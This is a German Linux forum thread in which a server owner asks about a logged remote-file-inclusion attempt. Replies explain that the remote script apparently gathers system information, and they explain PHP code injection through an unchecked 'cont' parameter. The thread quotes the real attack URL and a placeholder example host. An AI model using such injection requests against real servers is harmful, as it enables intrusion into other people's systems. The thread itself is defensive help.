Anzeige:
Ergebnis 1 bis 6 von 6

Thema: Was macht dieses Script

  1. #1
    Registrierter Benutzer
    Registriert seit
    Aug 2007
    Beiträge
    12

    Was macht dieses Script

    Jemand hat versucht auf meinen Server ein Script zu injecten oder sowas.
    Es wurde sowas aufgerufen /index.php?cont=http://irc.harazuku.co.cc/2002/.sh/responz/id2.tx
    t??

    Was macht das Script http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt ?

  2. #2
    Shell-User Avatar von zyrusthc
    Registriert seit
    Jan 2004
    Beiträge
    6.340
    Sieht so aus als wenn es lediglich Informationen über Festplattennutzung und php-version preis geben soll. Und weitere allgemeine Systeminformationen ....


    Greeez Oli
    Notebook: Lenovo Z570 CoreI7
    Workstation: Core2Quad Q6700 - ASUS P5WDG2-WS Pro - 8800GT - 4GB-DDR2/800 - 4x500GB=RAID1 - 120GB SSD - Innovatek Wakü - 27Widescreen/AcerTFT
    Server: IBM X345 + Netfinity 5000

    http://zyrusthc-linux.no-ip.org

  3. #3
    Roger Wilco
    Gast
    Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...

  4. #4
    Registrierter Benutzer
    Registriert seit
    Aug 2007
    Beiträge
    12
    Zitat Zitat von Roger Wilco Beitrag anzeigen
    Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...
    Was genau bedeutet das ?

  5. #5
    Flachinformatiker Avatar von MiGo
    Registriert seit
    Oct 2002
    Ort
    Heidelberg
    Beiträge
    5.270
    Was genau bedeutet das ?
    Das bedeutet, dass wenn du ein für Code-Injection verwundbares Script hast (Stichwort Werteüberprüfung etc.) ein Angreifer einfach ein Script auf einem entfernten Webserver von deinem Webserver ausführen lassen kann. Statt z.b. die Datei "content.txt" auszugeben würde dann dein Webserver halt "http://boeserhost.tld/fieses_script" laden und auf deinem Webserver mit dessen rechten ausführen.

    Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...
    Naja, nur weil man den Eintrag in den Logs findet, muss noch lange nix passiert sein - ich hab von sowas täglich welche in den logs. Das sind meist schlicht automatisierte Angriffe über eine ganze IP-Range.
    "Da steht sowas ähnliches wie" oder "das funzt net!!" ist keine Fehlermeldung!

  6. #6
    Roger Wilco
    Gast
    Zitat Zitat von MiGo Beitrag anzeigen
    Naja, nur weil man den Eintrag in den Logs findet, muss noch lange nix passiert sein - ich hab von sowas täglich welche in den logs. Das sind meist schlicht automatisierte Angriffe über eine ganze IP-Range.
    Deshalb die Einschränkung 'wenn' (im Sinne von 'falls') im Nebensatz.

Ähnliche Themen

  1. Script für ftp up/download
    Von _Cyber_ im Forum Linux Allgemein
    Antworten: 5
    Letzter Beitrag: 28.05.04, 06:05
  2. Script vor dem Auflegen starten - ideal für dyndns
    Von geronet im Forum Tipps und Tricks
    Antworten: 0
    Letzter Beitrag: 18.05.04, 21:02
  3. Perl Script per Cronjob starten
    Von Klaus_P im Forum Anbindung an die Aussenwelt
    Antworten: 2
    Letzter Beitrag: 16.05.04, 14:20
  4. Antworten: 2
    Letzter Beitrag: 21.05.03, 15:30
  5. Numlock per Script aktivieren...
    Von neXes im Forum System installieren und konfigurieren
    Antworten: 4
    Letzter Beitrag: 14.05.03, 19:02

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •